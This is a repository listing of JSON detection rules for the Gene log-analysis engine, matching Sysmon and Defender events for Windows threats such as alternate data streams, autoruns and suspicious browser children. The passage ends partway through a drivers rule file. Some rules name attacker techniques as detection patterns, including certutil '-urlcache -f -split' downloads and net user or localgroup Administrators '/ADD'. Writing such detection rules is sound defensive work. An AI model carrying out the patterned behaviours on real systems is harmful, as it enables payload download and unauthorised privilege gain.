├── LICENSE ├── README.md ├── compiled.gen ├── compiled.gen.sha256 ├── makefile ├── push.sh ├── rules ├── ads.gen ├── archives.gen ├── autoruns.gen ├── blacklist.gen ├── browsers.gen ├── canary.gen ├── certutil.gen ├── cmd.gen ├── commands.gen ├── defender │ ├── config.gen │ ├── detection.gen │ └── errors.gen ├── dns.gen ├── drivers.gen ├── filters │ └── sysmon.gen ├── heuristics.gen ├── informative.gen ├── laterals.gen ├── mimikatz.gen ├── network.gen ├── office.gen ├── powershell.gen ├── privesc.gen ├── psexec.gen ├── regexp.toml ├── regsvr32.gen ├── remotethread.gen ├── rundll32.gen ├── schedtasks.gen ├── services.gen ├── svchost.gen ├── sysmon.gen ├── timestomp.gen ├── tools.gen ├── wevtutil.gen ├── whids │ ├── README.md │ ├── cryptolocker.gen │ ├── heuristics.gen │ ├── injection.gen │ ├── polymorphic.gen │ ├── privesc.gen │ └── services.gen ├── whitelist.gen └── wmi.gen ├── scripts ├── requirements.txt ├── tester.conf.example └── tester.py ├── tests.md └── tests ├── AutomatedRecursiveDir.json ├── BrowserChild.json ├── CertutilSuspDecode.json ├── DownloadPath.json ├── EmbeddedHTTPLinkInCL.json ├── EventClearing.json ├── ExecDownloadedDocument.json ├── ExecTimestomping.json ├── ExecutableADS.json ├── ExecutableFileCreated.json ├── ExecutableUnkExt.json ├── ExplicitNetworkLogon.json ├── ExplorerInjection.json ├── FilePrivEsc.json ├── Heur7zExec.json ├── HeurADSInCL.json ├── HeurCLWithCreds.json ├── HeurCallShellcode.json ├── HeurDropper.json ├── HeurMaliciousAccess.json ├── HeurOfficeThreat.json ├── HeurPersistentRAT.json ├── HeurRAT.json ├── HeurRemotePayload.json ├── HeurSpawnShell.json ├── HeurSuspFileWrite.json ├── HeurWebShell.json ├── HeurZipExec.json ├── HeuristicSamlibDll.json ├── HeuristicVaultcliDll.json ├── HiddenPsExec.json ├── HighlyPolymorphicCode.json ├── LargeBase64.json ├── LargeCL512.json ├── LargeCL999.json ├── LateralWMI.json ├── LogonFromExternal.json ├── MSOfficeThreat.json ├── MaliciousLsassAccess.json ├── MaliciousSvchostAccess.json ├── MediumPolymorphicCode.json ├── Nbtstat.exe.json ├── Net.exe.json ├── NewADS.json ├── NewAutorun.json ├── NewExeCreatedInRoot.json ├── NewRemoteScheduledTask.json ├── NewSchedTaskInReg.json ├── NewSchedTaskOnDisk.json ├── OfficeDropper.json ├── OfficeDropperExec.json ├── PSC#Win32API.json ├── PowershellExecEnc.json ├── PowershellLargeCL.json ├── PowershellSamlibDll.json ├── PowershellStdin.json ├── ProcPrivEsc.json ├── PsExec.json ├── PsExec4624.json ├── PsExecCommand.json ├── Regsvr32ApplockerBypass.json ├── SecurityLogClearing.json ├── ServiceDeletion.json ├── StopSvchostAccess.json ├── SuspWMIC.json ├── SuspWriteAccess.json ├── SuspiciousADS.json ├── SuspiciousLsassAccess.json ├── SuspiciousRundll32.json ├── SuspiciousService.json ├── SuspiciousServiceCreated.json ├── SvcHostUnsignedDll.json ├── SvcHostUntrustedDLL.json ├── SysmonConfigChanged.json ├── SysmonEntePrivesc.json ├── SysmonFingerprinting.json ├── SysmonStateChanged.json ├── SystemInfo.exe.json ├── Tasklist.exe.json ├── UnkPrivDstPort.json ├── UntrustedDriverLoaded.json ├── UntrustedService.json ├── UserTempExec.json ├── WMIChildProcess.json ├── WMIEvents.json ├── WindowsTempExec.json └── Xcopy.exe.json /README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Rule repository to feed Gene https://github.com/0xrawsec/gene 4 | 5 | Writing your own rules: https://rawsec.lu/doc/gene/2.0/writerules.html 6 | 7 | # Warning 8 | 9 | Most of the rules here are generic and might not be exactly what you 10 | want so feel free to modify them. 11 | -------------------------------------------------------------------------------- /compiled.gen.sha256: -------------------------------------------------------------------------------- 1 | 5f467f922e6d94f5461bf43f224a73649db1d16f9a959f62a6e3bf58d786d24c compiled.gen 2 | -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | 2 | DST=compiled.gen 3 | 4 | all: compile 5 | 6 | verify: 7 | $(GENE) -r ./rules -verify 8 | 9 | test: verify 10 | echo "Testing Rules" 11 | echo "# Rules Coverage" > tests.md 12 | echo >> tests.md 13 | ./scripts/tester.py ./scripts/tester.conf | sed "s/$$/\n/" | tee -a tests.md 14 | 15 | compile: test verify 16 | $(GENE) -r ./rules -dump '.*' > $(DST) 17 | shasum -a 256 $(DST) > $(DST).sha256 18 | -------------------------------------------------------------------------------- /push.sh: -------------------------------------------------------------------------------- 1 | make 2 | if [[ $? != 0 ]] 3 | then 4 | exit $? 5 | fi 6 | 7 | git status 8 | read -p "Are you want to push all those files ? [y/n]" answer 9 | if [[ $answer == "y" ]] 10 | then 11 | git add -A 12 | git commit 13 | git push 14 | fi 15 | -------------------------------------------------------------------------------- /rules/ads.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NewADS", 3 | "Tags": [ 4 | "ADS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 15 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 0, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1096", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1096" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comments": "Catch all ADS creation events", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$broker: Image ~= '(?i:C:\\\\Windows\\\\system32\\\\browser_broker.exe)'", 27 | "$target: TargetFilename ~= '(?i::Zone\\.Identifier$)'" 28 | ], 29 | "Condition": "!($broker and $target)" 30 | } 31 | 32 | { 33 | "Name": "SuspiciousADS", 34 | "Tags": [ 35 | "ADS" 36 | ], 37 | "Meta": { 38 | "Events": { 39 | "Microsoft-Windows-Sysmon/Operational": [ 40 | 15 41 | ] 42 | }, 43 | "Computers": [], 44 | "Criticality": 8, 45 | "ATTACK": [ 46 | { 47 | "ID": "T1096", 48 | "Tactic": "defense-evasion", 49 | "Reference": "https://attack.mitre.org/techniques/T1096" 50 | } 51 | ], 52 | "Author": "0xrawsec", 53 | "Comments": "Catch ADS with suspicious extension", 54 | "Schema": "2.0.0" 55 | }, 56 | "Matches": [ 57 | "$target: TargetFilename ~= '(?i:({{script-exts}}|{{exec-exts}}))$'" 58 | ], 59 | "Condition": "$target" 60 | } 61 | 62 | { 63 | "Name": "ExecutableADS", 64 | "Tags": [ 65 | "ADS" 66 | ], 67 | "Meta": { 68 | "Events": { 69 | "Microsoft-Windows-Sysmon/Operational": [ 70 | 15 71 | ] 72 | }, 73 | "Computers": [], 74 | "Criticality": 10, 75 | "ATTACK": [ 76 | { 77 | "ID": "T1096", 78 | "Tactic": "defense-evasion", 79 | "Reference": "https://attack.mitre.org/techniques/T1096" 80 | } 81 | ], 82 | "Author": "0xrawsec", 83 | "Comments": "Heuristics trying to catch EXE in ADS. If it is an EXE it is very likely the IMPHASH field is not null.", 84 | "Schema": "2.0.0" 85 | }, 86 | "Matches": [ 87 | "$unk: Hash = 'Unknown'", 88 | "$impash: Hash ~= '(?i:(IMPHASH=00000000000000000000000000000000))'" 89 | ], 90 | "Condition": "!($impash or $unk)" 91 | } 92 | 93 | { 94 | "Name": "HeurADSInCL", 95 | "Tags": [ 96 | "Heuristics", 97 | "ADS" 98 | ], 99 | "Meta": { 100 | "Events": { 101 | "Microsoft-Windows-Sysmon/Operational": [ 102 | 1 103 | ] 104 | }, 105 | "Computers": [], 106 | "Criticality": 5, 107 | "ATTACK": [ 108 | { 109 | "ID": "T1096", 110 | "Tactic": "defense-evasion", 111 | "Reference": "https://attack.mitre.org/techniques/T1096" 112 | } 113 | ], 114 | "Author": "0xrawsec", 115 | "Comments": "Aims at catching the ADS like strings in command line", 116 | "Schema": "2.0.0" 117 | }, 118 | "Matches": [ 119 | "$ads: CommandLine ~= '(?i:\\.[a-z0-9]{2,5}:\\w*?\\.[a-z0-9]{2,5})'" 120 | ], 121 | "Condition": "$ads" 122 | } 123 | 124 | -------------------------------------------------------------------------------- /rules/archives.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Heur7zExec", 3 | "Tags": [ 4 | "Archive", 5 | "Exec", 6 | "Sysmon" 7 | ], 8 | "Meta": { 9 | "Events": { 10 | "Microsoft-Windows-Sysmon/Operational": [ 11 | 1 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 5, 16 | "ATTACK": [ 17 | { 18 | "ID": "T1193", 19 | "Tactic": "initial-access", 20 | "Reference": "https://attack.mitre.org/techniques/T1193" 21 | } 22 | ], 23 | "Author": "@0xrawsec", 24 | "Comment": "Execution from 7z archive", 25 | "Schema": "2.0.0" 26 | }, 27 | "Matches": [ 28 | "$pi: ParentImage ~= '(?i:\\\\7zFM\\.exe$)'", 29 | "$i: Image ~= '(?i:^C:\\\\Users\\\\.*\\\\AppData\\\\Local\\\\Temp\\\\)'", 30 | "$cl: CommandLine ~= '(\\\\Temp\\\\.*?({{exec-exts}}|{{script-exts}}))'" 31 | ], 32 | "Condition": "$pi and ($i or $cl)" 33 | } 34 | 35 | { 36 | "Name": "HeurZipExec", 37 | "Tags": [ 38 | "Archive", 39 | "Exec", 40 | "Sysmon" 41 | ], 42 | "Meta": { 43 | "Events": { 44 | "Microsoft-Windows-Sysmon/Operational": [ 45 | 1 46 | ] 47 | }, 48 | "Computers": [], 49 | "Criticality": 5, 50 | "ATTACK": [ 51 | { 52 | "ID": "T1193", 53 | "Tactic": "initial-access", 54 | "Reference": "https://attack.mitre.org/techniques/T1193" 55 | } 56 | ], 57 | "Author": "@0xrawsec", 58 | "Comment": "Catch scripts and exe launched directly from ZIP files (using Windows default)", 59 | "Schema": "2.0.0" 60 | }, 61 | "Matches": [ 62 | "$pi: ParentImage ~= '(?i:C:\\\\Windows\\\\Explorer\\.exe$)'", 63 | "$cl: CommandLine ~= '(?i:\\\\Temp.*?\\\\[^\\\\]*\\.zip\\\\[^\\\\]*({{exec-exts}}|{{script-exts}}))'" 64 | ], 65 | "Condition": "$pi and $cl" 66 | } 67 | 68 | -------------------------------------------------------------------------------- /rules/autoruns.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NewAutorun", 3 | "Tags": [ 4 | "Registry", 5 | "Autorun" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 13 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "ATTACK": [ 16 | { 17 | "ID": "T1060", 18 | "Tactic": "persistence", 19 | "Reference": "https://attack.mitre.org/techniques/T1060" 20 | } 21 | ], 22 | "Author": "@0xrawsec", 23 | "Comment": "Spot new autoruns", 24 | "Schema": "2.0.0" 25 | }, 26 | "Matches": [ 27 | "$eventtype: EventType = 'SetValue'", 28 | "$run: TargetObject ~= '(?i:{{SOFTWARE}}\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run)'", 29 | "$runonce: TargetObject ~= '(?i:{{SOFTWARE}}\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce)'", 30 | "$uimls: TargetObject ~= '(?i:\\\\Environment\\\\UserInitMprLogonScript$)'", 31 | "$com: TargetObject ~= '(?i:{{HKCR}}\\\\CLSID)'" 32 | ], 33 | "Condition": "$eventtype and ($run or $runonce or $uimls or $com)" 34 | } 35 | 36 | -------------------------------------------------------------------------------- /rules/blacklist.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "BlacklistedHash", 3 | "Tags": [ 4 | "Blacklist" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1, 10 | 6, 11 | 7 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 10, 16 | "Author": "0xrawsec", 17 | "Comment": "Check if any hash is known in the blacklist container", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$md5: extract('MD5=(?P[A-F0-9]{32})', Hashes) in blacklist", 22 | "$sha1: extract('SHA1=(?P[A-F0-9]{40})', Hashes) in blacklist", 23 | "$sha256: extract('SHA256=(?P[A-F0-9]{64})', Hashes) in blacklist" 24 | ], 25 | "Condition": "$md5 or $sha1 or $sha256" 26 | } 27 | 28 | { 29 | "Name": "BlacklistedImphash", 30 | "Tags": [ 31 | "Blacklist" 32 | ], 33 | "Meta": { 34 | "Events": { 35 | "Microsoft-Windows-Sysmon/Operational": [ 36 | 1, 37 | 6, 38 | 7 39 | ] 40 | }, 41 | "Computers": [], 42 | "Criticality": 8, 43 | "Author": "0xrawsec", 44 | "Comment": "Check if any hash is known in the blacklist container", 45 | "Schema": "2.0.0" 46 | }, 47 | "Matches": [ 48 | "$imphash: extract('IMPHASH=(?P[A-F0-9]{32})', Hashes) in blacklist" 49 | ], 50 | "Condition": "$imphash" 51 | } 52 | 53 | -------------------------------------------------------------------------------- /rules/browsers.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "BrowserSuspiciousChild", 3 | "Tags": [ 4 | "Browser" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 6, 14 | "Author": "0xrawsec", 15 | "Comment": "Experimental rule that look for suspicious browser child processes. Might raise FPs.", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$browser: ParentImage ~= '{{browsers}}$'", 20 | "$susp: Image ~= '{{suspicious}}$'", 21 | "$allowed: CommandLine ~= '(?i:rundll32\\.exe.*?(shell32\\.dll\"{0,1},(OpenAs_RunDLL|SHCreateLocalServerRunDll)|inetcpl\\.cpl\"{0,1},ClearMyTracksByProcess|ieframe.dll\"{0,1},OpenURL))'" 22 | ], 23 | "Condition": "$browser and $susp and !$allowed" 24 | } 25 | 26 | { 27 | "Name": "HeurBrowserInjection", 28 | "Tags": [ 29 | "Browser" 30 | ], 31 | "Meta": { 32 | "Events": { 33 | "Microsoft-Windows-Sysmon/Operational": [ 34 | 10 35 | ] 36 | }, 37 | "Computers": [], 38 | "Criticality": 8, 39 | "Author": "0xrawsec", 40 | "Comments": "Experimental rule to catch malicious browser access. Not widely tested.", 41 | "Schema": "2.0.0" 42 | }, 43 | "Matches": [ 44 | "$ct: CallTrace ~= 'UNKNOWN'", 45 | "$src: SourceImage ~= '{{browsers}}$'", 46 | "$dst: TargetImage ~= '{{browsers}}$'", 47 | "$write: GrantedAccess &= '0x20'" 48 | ], 49 | "Condition": "$dst and !$src and $ct and $write" 50 | } 51 | 52 | { 53 | "Name": "BrowserChild", 54 | "Tags": [ 55 | "Browser" 56 | ], 57 | "Meta": { 58 | "Events": { 59 | "Microsoft-Windows-Sysmon/Operational": [ 60 | 1 61 | ] 62 | }, 63 | "Computers": [], 64 | "Criticality": 0, 65 | "Author": "0xrawsec", 66 | "Comment": "Informative rule to flag process started by browser", 67 | "Schema": "2.0.0" 68 | }, 69 | "Matches": [ 70 | "$browser: ParentImage ~= '{{browsers}}$'" 71 | ], 72 | "Condition": "$browser" 73 | } 74 | 75 | -------------------------------------------------------------------------------- /rules/canary.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "CanaryFileRead", 3 | "Tags": [ 4 | "Canary" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Security": [ 9 | 4663 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "@0xrawsec", 15 | "Comment": "Canary File(s) that should not be read in normal circumstances. The canary regex template has to be adjusted for the rule to work.", 16 | "Requirements": "FileSystem Audit must be activated at least for the canary directories", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$access: AccessMask &= '0x1'", 21 | "$canary: ObjectName ~= '{{canary}}'" 22 | ], 23 | "Condition": "$access and $canary" 24 | } 25 | 26 | -------------------------------------------------------------------------------- /rules/certutil.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "CertutilDownloader", 3 | "Tags": [ 4 | "Tools" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 7, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1140", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1140" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comment": "Experimental rule to catch certutil downloader. Criticality may need to be adjusted", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$certutil: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\certutil\\.exe$)'", 27 | "$urlcache: CommandLine ~= '(?i: -urlcache )'", 28 | "$force: CommandLine ~= '(?i: -f )'", 29 | "$split: CommandLine ~= '(?i: -split )'" 30 | ], 31 | "Condition": "$certutil and $urlcache and $force and $split" 32 | } 33 | 34 | { 35 | "Name": "CertutilSuspDecode", 36 | "Tags": [ 37 | "Tools" 38 | ], 39 | "Meta": { 40 | "Events": { 41 | "Microsoft-Windows-Sysmon/Operational": [ 42 | 1 43 | ] 44 | }, 45 | "Computers": [], 46 | "Criticality": 7, 47 | "ATTACK": [ 48 | { 49 | "ID": "T1140", 50 | "Tactic": "defense-evasion", 51 | "Reference": "https://attack.mitre.org/techniques/T1140" 52 | } 53 | ], 54 | "Author": "0xrawsec", 55 | "Comment": "Experimental rule to catch dropper using certutil. Criticality may need to be adjusted", 56 | "Schema": "2.0.0" 57 | }, 58 | "Matches": [ 59 | "$certutil: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\certutil\\.exe$)'", 60 | "$suspdecode: CommandLine ~= '(?i: -decode.*({{exec-exts}}|{{script-exts}}))'" 61 | ], 62 | "Condition": "$certutil and $suspdecode" 63 | } 64 | 65 | -------------------------------------------------------------------------------- /rules/cmd.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "AutomatedRecursiveDir", 3 | "Tags": [ 4 | "Cmd" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 5, 14 | "Author": "@0xrawsec", 15 | "Comment": "Recursive directory listing", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$parent: ParentImage ~= '(?i:C:\\\\windows\\\\explorer.exe)'", 20 | "$exe: Image ~= '(?i:\\\\cmd.exe$)'", 21 | "$cmd: CommandLine ~= '(?i:dir.*?/s)'" 22 | ], 23 | "Condition": "!$parent and $exe and $cmd" 24 | } 25 | 26 | -------------------------------------------------------------------------------- /rules/commands.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "AddUser", 3 | "Tags": [ 4 | "" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "0xrawsec", 15 | "Comment": "New user created", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$net: Image ~= '(?i:C:\\\\Windows\\\\Sys(tem32|wow64)\\\\net1?\\.exe)'", 20 | "$command: CommandLine ~= 'user.*/ADD'" 21 | ], 22 | "Condition": "$net and $command" 23 | } 24 | 25 | { 26 | "Name": "NewLocalAdmin", 27 | "Tags": [ 28 | "" 29 | ], 30 | "Meta": { 31 | "Events": { 32 | "Microsoft-Windows-Sysmon/Operational": [ 33 | 1 34 | ] 35 | }, 36 | "Computers": [], 37 | "Criticality": 10, 38 | "Author": "0xrawsec", 39 | "Comment": "User added to local Administrators", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$net: Image ~= '(?i:C:\\\\Windows\\\\Sys(tem32|wow64)\\\\net1?\\.exe)'", 44 | "$command: CommandLine ~= '(?i:localgroup\\s+Administrators.*?/ADD)'" 45 | ], 46 | "Condition": "$net and $command" 47 | } 48 | 49 | -------------------------------------------------------------------------------- /rules/defender/config.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DefenderConfigChanged", 3 | "Tags": [ 4 | "Defender" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Windows Defender/Operational": [ 9 | 5007 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "Author": "0xrawsec", 15 | "Comments": "Windows Defender Antivirus configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.", 16 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [], 20 | "Condition": "" 21 | } 22 | 23 | { 24 | "Name": "DefenderFeatureDisabled", 25 | "Tags": [ 26 | "Defender" 27 | ], 28 | "Meta": { 29 | "Events": { 30 | "Microsoft-Windows-Windows Defender/Operational": [ 31 | 5010, 32 | 5012 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 10, 37 | "Author": "0xrawsec", 38 | "Comments": "Antivirus or antispyware disabled", 39 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [], 43 | "Condition": "" 44 | } 45 | 46 | -------------------------------------------------------------------------------- /rules/defender/detection.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DefenderMalwareDetected", 3 | "Tags": [ 4 | "Defender" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Windows Defender/Operational": [ 9 | 1006, 10 | 1116 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 10, 15 | "Author": "0xrawsec", 16 | "Comments": "A malware as been detected by Windows Defender", 17 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [], 21 | "Condition": "" 22 | } 23 | 24 | { 25 | "Name": "DefenderBehaviourDetected", 26 | "Tags": [ 27 | "Defender" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-Windows Defender/Operational": [ 32 | 1015 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 8, 37 | "Author": "0xrawsec", 38 | "Comments": "The antimalware platform detected suspicious behavior", 39 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [], 43 | "Condition": "" 44 | } 45 | 46 | -------------------------------------------------------------------------------- /rules/defender/errors.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DefenderActionCriticallyFailed", 3 | "Tags": [ 4 | "Defender" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Windows Defender/Operational": [ 9 | 1119, 10 | 5008 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "Author": "0xrawsec", 16 | "Comments": "The antimalware platform encountered a critical error when trying to take action on malware or other potentially unwanted software. There are more details in the event message.", 17 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [], 21 | "Condition": "" 22 | } 23 | 24 | -------------------------------------------------------------------------------- /rules/dns.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "BlacklistedDomain", 3 | "Tags": [ 4 | "DNS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-DNS-Client/Operational": [] 9 | }, 10 | "Computers": [], 11 | "Criticality": 10, 12 | "Author": "@0xrawsec", 13 | "Comment": "", 14 | "Schema": "2.0.0" 15 | }, 16 | "Matches": [ 17 | "$domainBL: extract('(?P\\w+\\.\\w+$)',QueryName) in blacklist'", 18 | "$subdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+$)',QueryName) in blacklist'", 19 | "$subsubdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+\\.\\w+$)',QueryName) in blacklist'" 20 | ], 21 | "Condition": "$domainBL or $subdomainBL or $subsubdomainBL" 22 | } 23 | 24 | { 25 | "Name": "DomainInMisp", 26 | "Tags": [ 27 | "DNS" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-DNS-Client/Operational": [] 32 | }, 33 | "Computers": [], 34 | "Criticality": 10, 35 | "Author": "@0xrawsec", 36 | "Comment": "Domain name present in MISP with IDS flag (misp container assumed)", 37 | "Schema": "2.0.0" 38 | }, 39 | "Matches": [ 40 | "$domainBL: extract('(?P\\w+\\.\\w+$)',QueryName) in misp'", 41 | "$subdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'", 42 | "$subsubdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'" 43 | ], 44 | "Condition": "$domainBL or $subdomainBL or $subsubdomainBL" 45 | } 46 | 47 | { 48 | "Name": "SysmonDomainInMisp", 49 | "Tags": [ 50 | "DNS", 51 | "Sysmon" 52 | ], 53 | "Meta": { 54 | "Events": { 55 | "Microsoft-Windows-Sysmon/Operational": [ 56 | 22 57 | ] 58 | }, 59 | "Computers": [], 60 | "Criticality": 10, 61 | "Author": "@0xrawsec", 62 | "Comment": "Domain name present in MISP with IDS flag (misp container assumed)", 63 | "Schema": "2.0.0" 64 | }, 65 | "Matches": [ 66 | "$domainBL: extract('(?P\\w+\\.\\w+$)',QueryName) in misp'", 67 | "$subdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'", 68 | "$subsubdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'" 69 | ], 70 | "Condition": "$domainBL or $subdomainBL or $subsubdomainBL" 71 | } 72 | 73 | { 74 | "Name": "HeurLongDomain", 75 | "Tags": [ 76 | "DNS", 77 | "Heuristics" 78 | ], 79 | "Meta": { 80 | "Events": { 81 | "Microsoft-Windows-DNS-Client/Operational": [] 82 | }, 83 | "Computers": [], 84 | "Criticality": 6, 85 | "Author": "@0xrawsec", 86 | "Comment": "Domain name with more than 50 characters", 87 | "Schema": "2.0.0" 88 | }, 89 | "Matches": [ 90 | "$ldomain: QueryName ~= '.{50,}'" 91 | ], 92 | "Condition": "$ldomain" 93 | } 94 | 95 | { 96 | "Name": "HeurSysmonLongDomain", 97 | "Tags": [ 98 | "DNS", 99 | "Heuristics", 100 | "Sysmon" 101 | ], 102 | "Meta": { 103 | "Events": { 104 | "Microsoft-Windows-Sysmon/Operational": [ 105 | 22 106 | ] 107 | }, 108 | "Computers": [], 109 | "Criticality": 6, 110 | "Author": "@0xrawsec", 111 | "Comment": "Domain name with more than 50 characters", 112 | "Schema": "2.0.0" 113 | }, 114 | "Matches": [ 115 | "$ldomain: QueryName ~= '.{50,}'", 116 | "$ip6: QueryName ~= 'ip6\\.arpa\\.$'" 117 | ], 118 | "Condition": "$ldomain and !$ip6" 119 | } 120 | 121 | { 122 | "Name": "HeurDnsFromSuspicious", 123 | "Tags": [ 124 | "DNS", 125 | "Heuristics" 126 | ], 127 | "Meta": { 128 | "Events": { 129 | "Microsoft-Windows-Sysmon/Operational": [ 130 | 22 131 | ] 132 | }, 133 | "Computers": [], 134 | "Criticality": 5, 135 | "Author": "@0xrawsec", 136 | "Comment": "DNS query from executables often used by malware. Might trigger some FPs that would need to be whitelisted.", 137 | "Schema": "2.0.0" 138 | }, 139 | "Matches": [ 140 | "$susp: Image ~= '{{suspicious}}$'" 141 | ], 142 | "Condition": "$susp" 143 | } 144 | 145 | -------------------------------------------------------------------------------- /rules/drivers.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DriverLoadedUnusualPath", 3 | "Tags": [ 4 | "DriverLoaded" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 6 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 4, 14 | "Author": "@0xrawsec", 15 | "Schema": "2.0.0" 16 | }, 17 | "Matches": [ 18 | "$uspath1: ImageLoaded ~= '(?i:C:\\\\Windows\\\\Sys(wow64|tem32))'", 19 | "$uspath2: ImageLoaded ~= '(?i:C:\\\\Windows\\\\Sys(tem32|wow64)\\\\drivers)'" 20 | ], 21 | "Condition": "!$uspath1 and !$uspath2" 22 | } 23 | 24 | { 25 | "Name": "DriverLoadedNotValidSig", 26 | "Tags": [ 27 | "DriverLoaded", 28 | "Signature" 29 | ], 30 | "Meta": { 31 | "Events": { 32 | "Microsoft-Windows-Sysmon/Operational": [ 33 | 6 34 | ] 35 | }, 36 | "Computers": [], 37 | "Criticality": 3, 38 | "Author": "@0xrawsec", 39 | "Comments": "It may happens that drivers have not valid signatures", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$valid: SignatureStatus = 'Valid'" 44 | ], 45 | "Condition": "!$valid" 46 | } 47 | 48 | { 49 | "Name": "DriverLoadedSuspiciousSigStatus", 50 | "Tags": [ 51 | "DriverLoaded", 52 | "Signature" 53 | ], 54 | "Meta": { 55 | "Events": { 56 | "Microsoft-Windows-Sysmon/Operational": [ 57 | 6 58 | ] 59 | }, 60 | "Computers": [], 61 | "Criticality": 7, 62 | "Author": "@0xrawsec", 63 | "Comments": "Experimental", 64 | "Schema": "2.0.0" 65 | }, 66 